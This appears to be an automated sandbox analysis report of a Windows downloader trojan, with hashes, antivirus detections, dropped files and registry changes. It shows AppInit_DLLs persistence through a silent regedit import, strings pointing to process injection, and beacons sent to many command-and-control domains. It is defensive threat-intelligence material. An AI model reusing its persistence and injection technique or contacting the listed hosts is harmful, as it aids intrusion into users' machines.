Analysis Date2014-11-12 18:59:05
MD50d4f8aa66ddeb2f00c55b4d9dad091e6
SHA1596a73426a844b6c1de2978a7c3ece0efacd5bc0

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 7c0eab503cb4dffa67d3689ec609d3a3 sha1: c7a4f222594573a280be687b710b5e012f64ebff size: 54784
Section.data md5: c37a4dd6e7451fc9eaf27dc929eeab36 sha1: d90b4de0b2c1f1494ddda0f92aa503bfb141ba16 size: 69632
Timestamp2012-09-19 09:26:48
Pdb pathC:\Install\Release\exe.pdb
PackerMicrosoft Visual C++ ?.?
PEhashcec3f3d5caccb0805c169b50b0fe0314d48f986f
IMPhashbfa0d41624e02f4195f26b63cb067948
AV360 SafeGen:Trojan.Heur.JP.hiW@aesMXwfi
AVAd-AwareGen:Trojan.Heur.JP.hiW@aesMXwfi
AVAlwil (avast)Trojan-gen:Win32:Trojan-gen
AVArcabit (arcavir)no_virus
AVAuthentiumno_virus
AVAvira (antivir)TR/Dldr.Vundo.J.69
AVBullGuardGen:Trojan.Heur.JP.hiW@aesMXwfi
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)Trojan.Cidox.r2
AVClamAVno_virus
AVDr. WebTrojan.Mayachok.17789
AVEmsisoftGen:Trojan.Heur.JP.hiW@aesMXwfi
AVEset (nod32)Win32/Citirevo.AD
AVFortinetW32/Citirevo.ADI!tr
AVFrisk (f-prot)no_virus
AVF-SecureGen:Trojan.Heur.JP.hiW@aesMXwfi
AVGrisoft (avg)Downloader.Generic13.FLQ.dropper
AVIkarusTrojan.Win32.Cidox
AVK7Riskware ( 0040eff71 )
AVKasperskyTrojan.Win32.Cidox.amfo
AVMalwareBytesno_virus
AVMcafeeno_virus
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Vundo.J
AVMicroWorld (escan)Gen:Trojan.Heur.JP.hiW@aesMXwfi
AVNormanGen:Trojan.Heur.JP.hiW@aesMXwfi
AVRisingno_virus
AVSophosno_virus
AVSymantecTrojan.Gen
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Process
↳ C:\WINDOWS\Explorer.EXE

RegistryHKEY_CURRENT_USER\SessionInformation\ProgramCount ➝
NULL
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\system32\mhwnphe.dll
Creates FileC:\Documents and Settings\Administrator\Cookies\cf
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates ProcessC:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNS91.233.89.106
Winsock DNSclickbeta.ru
Winsock DNSdenadb.com
Winsock DNSterrans.su
Winsock DNSnsknock.com
Winsock DNStryatdns.com
Winsock DNSclickclans.ru
Winsock DNSdenareclick.com
Winsock DNSfescheck.com
Winsock DNSinstrango.com
Winsock DNSflersomstk.com
Winsock DNStegimode.com
Winsock DNSnetrovad.com
Winsock DNSnshouse1.com
Winsock DNSforadns.com
Winsock DNSgetavodes.com
Winsock DNSclickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝
C:\WINDOWS\system32\mhwnphe.dll\\x00

Network Details:

DNSgetavodes.com
Type: A
141.8.225.80
DNStryatdns.com
Type: A
209.222.14.3
DNSfescheck.com
Type: A
209.222.14.3
DNSinstrango.com
Type: A
209.222.14.3
DNSdenadb.com
Type: A
204.11.56.26
DNSforadns.com
Type: A
141.8.225.62
DNSflersomstk.com
Type: A
DNSnetrovad.com
Type: A
DNSnsknock.com
Type: A
DNSterrans.su
Type: A
DNStegimode.com
Type: A
DNSclickstano.com
Type: A
DNSdenareclick.com
Type: A
DNSclickbeta.ru
Type: A
DNSnshouse1.com
Type: A
DNSclickclans.ru
Type: A
HTTP GEThttp://getavodes.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1445&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg6dmve9oLBal2bzc3XW25gJrBThdNyzvm841tYaAoySz
User-Agent:
HTTP GEThttp://tryatdns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1445&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg6dmve9oLBal2bzc3XW25gJrBThdNyzvm9+GK9hHwJNZ
User-Agent:
HTTP GEThttp://fescheck.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1445&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg6dmve9oLBal2bzc3XW25gJrBThdNyzvm1/oZuteS4ZE
User-Agent:
HTTP GEThttp://instrango.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1445&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg6dmve9oLBal2bzc3XW25gJrBThdNyzvm05E/mZKwST6
User-Agent:
HTTP GEThttp://denadb.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1445&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg6dmve9oLBal2bzc3XW25gJrBThdNyzvm7aj8fQOK00U
User-Agent:
HTTP GEThttp://foradns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1445&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg6dmve9oLBal2bzc3XW25gJrBThdNyzvm8EqEHt5JLD2
User-Agent:
HTTP GEThttp://91.233.89.106/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1445&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg6dmve9oLBal2bzc3XW25gJrBThdNyzvm4/pWEmcyicG
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1032 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1033 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1034 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1035 ➝ 204.11.56.26:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.62:80
Flows TCP192.168.1.1:1037 ➝ 91.233.89.106:80

Raw Pcap
0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 34343526   XX0000&key=1445&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333936 266f733d 352e312e 32363030   =396&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796736 646d7665 396f4c42 616c3262   Wyg6dmve9oLBal2b
0x000000b0 (00176)   7a633358 57323567 4a724254 68644e79   zc3XW25gJrBThdNy
0x000000c0 (00192)   7a766d38 34317459 61416f79 537a2048   zvm841tYaAoySz H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2067   TTP/1.1..Host: g
0x000000e0 (00224)   65746176 6f646573 2e636f6d 0d0a0d0a   etavodes.com....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 34343526   XX0000&key=1445&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333936 266f733d 352e312e 32363030   =396&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796736 646d7665 396f4c42 616c3262   Wyg6dmve9oLBal2b
0x000000b0 (00176)   7a633358 57323567 4a724254 68644e79   zc3XW25gJrBThdNy
0x000000c0 (00192)   7a766d39 2b474b39 6848774a 4e5a2048   zvm9+GK9hHwJNZ H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2074   TTP/1.1..Host: t
0x000000e0 (00224)   72796174 646e732e 636f6d0d 0a0d0a0a   ryatdns.com.....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 34343526   XX0000&key=1445&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333936 266f733d 352e312e 32363030   =396&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796736 646d7665 396f4c42 616c3262   Wyg6dmve9oLBal2b
0x000000b0 (00176)   7a633358 57323567 4a724254 68644e79   zc3XW25gJrBThdNy
0x000000c0 (00192)   7a766d31 2f6f5a75 74655334 5a452048   zvm1/oZuteS4ZE H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2066   TTP/1.1..Host: f
0x000000e0 (00224)   65736368 65636b2e 636f6d0d 0a0d0a0a   escheck.com.....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 34343526   XX0000&key=1445&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333936 266f733d 352e312e 32363030   =396&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796736 646d7665 396f4c42 616c3262   Wyg6dmve9oLBal2b
0x000000b0 (00176)   7a633358 57323567 4a724254 68644e79   zc3XW25gJrBThdNy
0x000000c0 (00192)   7a766d30 35452f6d 5a4b7753 54362048   zvm05E/mZKwST6 H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2069   TTP/1.1..Host: i
0x000000e0 (00224)   6e737472 616e676f 2e636f6d 0d0a0d0a   nstrango.com....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 34343526   XX0000&key=1445&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333936 266f733d 352e312e 32363030   =396&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796736 646d7665 396f4c42 616c3262   Wyg6dmve9oLBal2b
0x000000b0 (00176)   7a633358 57323567 4a724254 68644e79   zc3XW25gJrBThdNy
0x000000c0 (00192)   7a766d37 616a3866 514f4b30 30552048   zvm7aj8fQOK00U H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2064   TTP/1.1..Host: d
0x000000e0 (00224)   656e6164 622e636f 6d0d0a0d 0a0a0d0a   enadb.com.......
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 34343526   XX0000&key=1445&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333936 266f733d 352e312e 32363030   =396&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796736 646d7665 396f4c42 616c3262   Wyg6dmve9oLBal2b
0x000000b0 (00176)   7a633358 57323567 4a724254 68644e79   zc3XW25gJrBThdNy
0x000000c0 (00192)   7a766d38 45714548 74354a4c 44322048   zvm8EqEHt5JLD2 H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2066   TTP/1.1..Host: f
0x000000e0 (00224)   6f726164 6e732e63 6f6d0d0a 0d0a0d0a   oradns.com......
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 34343526   XX0000&key=1445&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d333936 266f733d 352e312e 32363030   =396&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796736 646d7665 396f4c42 616c3262   Wyg6dmve9oLBal2b
0x000000b0 (00176)   7a633358 57323567 4a724254 68644e79   zc3XW25gJrBThdNy
0x000000c0 (00192)   7a766d34 2f705745 6d637969 63472048   zvm4/pWEmcyicG H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2039   TTP/1.1..Host: 9
0x000000e0 (00224)   312e3233 332e3839 2e313036 0d0a0d0a   1.233.89.106....
0x000000f0 (00240)                                         


Strings
.CC.
 
\S
.
.
\0105.tmp
- abort() has been called
April
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
CONOUT$
- CRT not initialized
dddd, MMMM dd, yyyy
December
DOMAIN error
erunas
explorer.exe
February
- floating point support not loaded
Friday
                                 H
         (((((                  H
         h((((                  H
HH:mm:ss
\Iterra
January
jjjjjj
July
June
KERNEL32.DLL
March
@Microsoft Visual C++ Runtime Library
MM/dd/yy
Monday
mscoree.dll
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
October
Program: 
<program name unknown>
- pure virtual function call
R6002
R6008
R6009
R6010
R6016
R6017
R6018
R6019
R6024
R6025
R6026
R6027
R6028
R6030
R6031
R6032
R6033
\regedit.exe
\regedt32.exe
runtime error 
Runtime Error!
/s "
Saturday
September
Service Pack 
shell32.dll
SING error
Sunday
\T03emp03.reg
tElevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
Thursday
TLOSS error
Tuesday
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Wednesday
Wole32.dll
WUSER32.DLL
                          
\0105.tmp
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
1C#nQ.L
1|H`14
>}~2+)zH
^3b6iVWZ
3}Fx%y
/<3T-6{
5	?$pI
7|k;174
#;@:-8$A
"8|yx)}K `2
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
\AddIterra
AdjustTokenPrivileges
ADVAPI32.dll
AllocateAndInitializeSid
"AppInit_DLLs"="
AppInit_DLLs
<at,<rt"<wt
August
*a Xp$
b$6*u]
BD$L|-
########c:\
CheckTokenMembership
c#Hj~]
C:\Install\Release\exe.pdb
CloseHandle
CoGetObject
CoInitializeEx
CopyFileW
CorExitProcess
CoUninitialize
CreateDirectoryA
CreateDirectoryW
CreateFileA
CreateFileW
CreateRemoteThread
CreateToolhelp32Snapshot
`.data
dddd, MMMM dd, yyyy
December
DecodePointer
DeleteCriticalSection
DeleteFileA
DeleteFileW
e(=JO]
EncodePointer
EnterCriticalSection
e\)>SL
ExitProcess
ey|\!G
February
(f.\F'
fIb<_d2
flash_player_update.exe
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FlushFileBuffers
FreeEnvironmentStringsW
FreeLibrary
FreeSid
Friday
FXZ,E't
GetACP
GetActiveWindow
GetCommandLineA
GetCommandLineW
GetConsoleCP
GetConsoleMode
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentStringsW
GetExitCodeThread
GetFileType
GetLastActivePopup
GetLastError
GetModuleFileNameW
GetModuleHandleW
GetNativeSystemInfo
GetOEMCP
GetProcAddress
GetProcessHeap
GetProcessWindowStation
GetStartupInfoW
GetStdHandle
GetStringTypeW
GetSystemDirectoryA
GetSystemDirectoryW
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationW
GetVersionExW
GetWindowsDirectoryW
 gP"9A
hE7Z5^
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSetInformation
HeapSize
HH:mm:ss
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
HL=:G[
!)'I]8uQ
i< b8#
Ie=Np2`K
_InfoKey
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
(iRz8N
IsDebuggerPresent
IsProcessorFeaturePresent
IsValidCodePage
\Iterra
@iWXvirZ
(J(]=?
January
j@j ^V
JO{"7R]
\JY9lPg
KERNEL32.dll
.}k L;o
LCMapStringW
LeaveCriticalSection
"LoadAppInit_DLLs"=dword:00000001
LoadLibraryA
LoadLibraryW
LookupPrivilegeValueA
lstrcmpiA
lstrcmpiW
lstrlenA
lTsg F
<m1iDeV
MessageBoxW
<M](#m
MM/dd/yy
Monday
mO!sYID
MultiByteToWideChar
M&v}	d
November
n:/u?P
October
Od`<WJ
OpenProcess
OpenProcessToken
PPPPPPPP
Process32FirstW
Process32NextW
PuEi) 
q7Xb$@S
(q%[b$f
QQSVWh
QueryPerformanceCounter
ReadFile
RegCloseKey
regedit.exe
regedt32.exe
RegOpenKeyExA
RegQueryValueExA
RemoveDirectoryW
r( %GpN
RSDSm$
RtlUnwind
rvo*>lX
	?RW&H
Saturday
SeDebugPrivilege
September
SetEndOfFile
SetFilePointer
SetHandleCount
SetLastError
SetStdHandle
SetUnhandledExceptionFilter
SHCreateItemFromParsingName
SHELL32.dll
ShellExecuteExA
ShellExecuteExW
SHGetFolderPathA
SHGetFolderPathW
SHLWAPI.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
^SSSSS
StrStrIW
Sunday
S)W!A"
\T03emp03.reg
\T04emp04.reg
t7{>10
tCHt(Ht 
TerminateProcess
!This program cannot be run in DOS mode.
Thursday
ti--La
t	j\Yf
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
t"SS9] u
!T!sV?
Tuesday
;t$,v-
U1T0_!
u1vw1T
uBTUa$5
u}ht!@
u)jAXf;
um#3k/
UnhandledExceptionFilter
UNICODE
UQPXY]Y[
UrAe ?
URPQQh
UTF-16LE
vfoI^2r5
V_?~Ho
VirtualAllocEx
v	N+D$
VpSr^R
W9V.7&
WaitForSingleObject
W&bD!{
Wednesday
WideCharToMultiByte
Windows Registry Editor Version 5.00
WriteConsoleW
WriteFile
WriteProcessMemory
X1wy_&G
x7oO4A
x8?=QX
ZGR+mYNo{
z}:%l&
z\(x}B
z |y2N